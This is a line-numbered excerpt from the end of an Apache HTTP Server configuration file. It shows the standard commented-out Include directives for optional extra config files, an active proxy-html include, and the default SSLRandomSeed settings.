467 | #Include conf/extra/httpd-multilang-errordoc.conf
468 |
469 | # Fancy directory listings
470 | #Include conf/extra/httpd-autoindex.conf
471 |
472 | # Language settings
473 | #Include conf/extra/httpd-languages.conf
474 |
475 | # User home directories
476 | #Include conf/extra/httpd-userdir.conf
477 |
478 | # Real-time info on requests and configuration
479 | #Include conf/extra/httpd-info.conf
480 |
481 | # Virtual hosts
482 | #Include conf/extra/httpd-vhosts.conf
483 |
484 | # Local access to the Apache HTTP Server Manual
485 | #Include conf/extra/httpd-manual.conf
486 |
487 | # Distributed authoring and versioning (WebDAV)
488 | #Include conf/extra/httpd-dav.conf
489 |
490 | # Various default settings
491 | #Include conf/extra/httpd-default.conf
492 |
493 | # Configure mod_proxy_html to understand HTML4/XHTML1
494 |
495 | Include conf/extra/proxy-html.conf
496 |
497 |
498 | # Secure (SSL/TLS) connections
499 | #Include conf/extra/httpd-ssl.conf
500 | #
501 | # Note: The following must be present to support
502 | # starting without SSL on platforms with no /dev/random equivalent
503 | # but a statically compiled-in mod_ssl.
504 | #
505 |
506 | SSLRandomSeed startup builtin
507 | SSLRandomSeed connect builtin
508 |
509 |
510 |
--------------------------------------------------------------------------------